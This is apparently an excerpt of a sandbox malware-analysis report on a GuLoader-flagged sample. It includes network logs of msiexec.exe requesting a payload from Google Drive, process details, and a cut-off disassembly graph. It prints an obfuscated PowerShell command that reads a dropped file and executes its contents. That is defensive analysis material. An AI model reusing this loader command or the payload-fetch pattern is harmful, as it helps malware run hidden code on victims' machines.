                                                          Connection: close
                                                          2025-01-11 00:31:28 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 49 53 43 2d 4c 4d 78 50 47 7a 73 5a 45 58 51 6a 4a 52 4f 67 33 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ISC-LMxPGzsZEXQjJROg3g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          38192.168.2.950012142.250.184.2064433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:31:29 UTC417OUTGET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:29 UTC1920INHTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:29 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Content-Security-Policy: script-src 'nonce-AjZiKLPqO9iU_jUcBqFK0g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          39192.168.2.950013142.250.181.2254433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:31:30 UTC459OUTGET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:30 UTC1844INHTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFIdbgSsJaHM8ZID_RUSr7QbhDc8egCOSyxw-vTHGGN_a2ursp8JJtiTVsdzWf5v12yuLjpv
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:30 GMT
                                                          Content-Security-Policy: script-src 'nonce-THGXdzEIljQTtz1jMGx2Eg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:31:30 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 73 36 46 6f 52 44 51 50 67 35 53 6c 69 75 76 33 5f 4a 55 6a 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7s6FoRDQPg5Sliuv3_JUjw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          40192.168.2.950014142.250.184.2064433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:31:31 UTC417OUTGET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:31 UTC1920INHTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:31 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Content-Security-Policy: script-src 'nonce-5t7DYpVv5JeibDD78mMMrg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          41192.168.2.950015142.250.181.2254433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:31:32 UTC459OUTGET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:33 UTC1851INHTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFIdbgT4QN3obU-V2e7G99WZnyN8KpP8aAjoPYkkZ7uDjxRFd5epXCJwcsQsaoE6Fs2WzXySb2heQEY
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:32 GMT
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-1vMHemRUBHz9hacSIoVhfA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:31:33 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4d 4e 49 77 48 38 6d 53 68 71 64 76 48 6d 73 50 43 30 34 52 6e 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="MNIwH8mShqdvHmsPC04RnQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          42192.168.2.950016142.250.184.2064433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:31:33 UTC417OUTGET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:34 UTC1920INHTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:34 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-v9CtMqvkF6hKcpf430QXjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          43192.168.2.950017142.250.181.2254433848C:\Windows\SysWOW64\msiexec.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-11 00:31:35 UTC459OUTGET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:35 UTC1851INHTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFIdbgROWE_2dDeHaLLZtcWPyE7Jx_B8G3488R9h9pJHV7g3738by8f8BJK49aECD8EJADFHLXaRtgc
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:35 GMT
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-SE2xFG62UeOZ9hImxd_QNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:31:35 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6c 46 58 63 50 7a 43 63 65 72 4b 68 37 76 53 72 61 4a 72 31 46 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="lFXcPzCcerKh7vSraJr1Fg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:19:29:30
                                                          Start date:10/01/2025
                                                          Path:C:\Users\user\Desktop\YrCSUX2O3I.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\YrCSUX2O3I.exe"
                                                          Imagebase:0x400000
                                                          File size:1'069'784 bytes
                                                          MD5 hash:13DCCF3D94C8435353A3BF886CA19E7E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:2
                                                          Start time:19:29:33
                                                          Start date:10/01/2025
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"powershell.exe" -windowstyle minimized "$Willock=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Hjtryks.Tog';$Fysiologen=$Willock.SubString(2860,3);.$Fysiologen($Willock)"
                                                          Imagebase:0x560000
                                                          File size:433'152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:3
                                                          Start time:19:29:33
                                                          Start date:10/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:8
                                                          Start time:19:30:35
                                                          Start date:10/01/2025
                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                          Imagebase:0xfc0000
                                                          File size:59'904 bytes
                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000002.2577978803.000000000452E000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:false

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:22.3%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:21.7%
                                                            Total number of Nodes:1267
                                                            Total number of Limit Nodes:30
                                                            execution_graph 3396 401d41 GetDC GetDeviceCaps 3404 402ab3 3396->3404 3398 401d5f MulDiv ReleaseDC 3399 402ab3 18 API calls 3398->3399 3400 401d7e 3399->3400 3401 405d68 18 API calls 3400->3401 3402 401db7 CreateFontIndirectW 3401->3402 3403 4024e6 3402->3403 3405 405d68 18 API calls 3404->3405 3406 402ac7 3405->3406 3406->3398 3407 401a42 3408 402ab3 18 API calls 3407->3408 3409 401a48 3408->3409 3410 402ab3 18 API calls 3409->3410 3411 4019f0 3410->3411 3412 401cc6 3413 402ab3 18 API calls 3412->3413 3414 401cd9 SetWindowLongW 3413->3414 3415 40295d 3414->3415 3416 401dc7 3417 402ab3 18 API calls 3416->3417 3418 401dcd 3417->3418 3419 402ab3 18 API calls 3418->3419 3420 401dd6 3419->3420 3421 401de8 EnableWindow 3420->3421 3422 401ddd ShowWindow 3420->3422 3423 40295d 3421->3423 3422->3423 3424 401bca 3425 402ab3 18 API calls 3424->3425 3426 401bd1 3425->3426 3427 402ab3 18 API calls 3426->3427 3428 401bdb 3427->3428 3429 401beb 3428->3429 3431 402ad0 18 API calls 3428->3431 3430 401bfb 3429->3430 3432 402ad0 18 API calls 3429->3432 3433 401c06 3430->3433 3434 401c4a 3430->3434 3431->3429 3432->3430 3435 402ab3 18 API calls 3433->3435 3436 402ad0 18 API calls 3434->3436 3437 401c0b 3435->3437 3438 401c4f 3436->3438 3439 402ab3 18 API calls 3437->3439 3440 402ad0 18 API calls 3438->3440 3442 401c14 3439->3442 3441 401c58 FindWindowExW 3440->3441 3445 401c7a 3441->3445 3443 401c3a SendMessageW 3442->3443 3444 401c1c SendMessageTimeoutW 3442->3444 3443->3445 3444->3445 3446 4024ca 3447 402ad0 18 API calls 3446->3447 3448 4024d1 3447->3448 3451 4059cf GetFileAttributesW CreateFileW 3448->3451 3450 4024dd 3451->3450 3452 40194b 3453 402ab3 18 API calls 3452->3453 3454 401952 3453->3454 3455 